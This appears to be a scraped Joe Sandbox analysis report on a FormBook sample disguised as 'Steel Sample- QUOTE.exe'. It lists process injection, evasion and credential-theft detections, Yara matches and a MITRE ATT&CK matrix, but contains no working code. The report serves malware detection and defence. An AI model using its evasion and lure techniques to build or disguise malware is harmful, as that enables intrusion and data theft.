Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352733A0 mov eax, dword ptr fs:[00000030h]	6_2_352733A0
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Code function: 6_2_352733A0 mov eax, dword ptr fs:[00000030h]	6_2_352733A0

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: NULL target: C:\Program Files (x86)\mqqCToySglVndQwEQpNyLtEuiWLEMrENaXhAVyToWIKlNXRLbIjWTKRJNIFuMxtHROciWYraapEkb\VHmANgjD4Skpj.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: NULL target: C:\Program Files (x86)\mqqCToySglVndQwEQpNyLtEuiWLEMrENaXhAVyToWIKlNXRLbIjWTKRJNIFuMxtHROciWYraapEkb\VHmANgjD4Skpj.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: NULL target: C:\Program Files (x86)\mqqCToySglVndQwEQpNyLtEuiWLEMrENaXhAVyToWIKlNXRLbIjWTKRJNIFuMxtHROciWYraapEkb\VHmANgjD4Skpj.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: NULL target: C:\Program Files (x86)\mqqCToySglVndQwEQpNyLtEuiWLEMrENaXhAVyToWIKlNXRLbIjWTKRJNIFuMxtHROciWYraapEkb\VHmANgjD4Skpj.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: NULL target: C:\Program Files (x86)\mqqCToySglVndQwEQpNyLtEuiWLEMrENaXhAVyToWIKlNXRLbIjWTKRJNIFuMxtHROciWYraapEkb\VHmANgjD4Skpj.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: NULL target: C:\Program Files (x86)\mqqCToySglVndQwEQpNyLtEuiWLEMrENaXhAVyToWIKlNXRLbIjWTKRJNIFuMxtHROciWYraapEkb\VHmANgjD4Skpj.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe	Section loaded: NULL target: C:\Program Files (x86)\mqqCToySglVndQwEQpNyLtEuiWLEMrENaXhAVyToWIKlNXRLbIjWTKRJNIFuMxtHROciWYraapEkb\VHmANgjD4Skpj.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Process created: C:\Users\user\Desktop\Steel Sample- QUOTE.exe "C:\Users\user\Desktop\Steel Sample- QUOTE.exe"

Jump to behavior

Source: VHmANgjD4Skpj.exe, 0000000F.00000002.3721250597.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, VHmANgjD4Skpj.exe, 0000000F.00000000.2625277971.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, VHmANgjD4Skpj.exe, 00000010.00000000.2733123114.0000000000F10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: VHmANgjD4Skpj.exe, 0000000F.00000002.3721250597.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, VHmANgjD4Skpj.exe, 0000000F.00000000.2625277971.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, VHmANgjD4Skpj.exe, 00000010.00000000.2733123114.0000000000F10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: VHmANgjD4Skpj.exe, 0000000F.00000002.3721250597.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, VHmANgjD4Skpj.exe, 0000000F.00000000.2625277971.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, VHmANgjD4Skpj.exe, 00000010.00000000.2733123114.0000000000F10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: VHmANgjD4Skpj.exe, 0000000F.00000002.3721250597.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, VHmANgjD4Skpj.exe, 0000000F.00000000.2625277971.00000000012A0000.00000002.00000001.00040000.00000000.sdmp, VHmANgjD4Skpj.exe, 00000010.00000000.2733123114.0000000000F10000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exe

Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405F0A

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000013.00000002.3722050968.0000000003720000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3909640512.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3722391436.0000000002F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3723468245.0000000004DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3722183676.0000000003380000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3940879523.0000000035F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3722353544.0000000004410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3723188281.0000000004820000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 00000013.00000002.3722050968.0000000003720000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3909640512.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3722391436.0000000002F60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3723468245.0000000004DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3722183676.0000000003380000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3940879523.0000000035F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3722353544.0000000004410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3723188281.0000000004820000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	112 Process Injection	11 Masquerading	OS Credential Dumping	211 Security Software Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	112 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	23 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Steel Sample- QUOTE.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Steel Sample- QUOTE.exe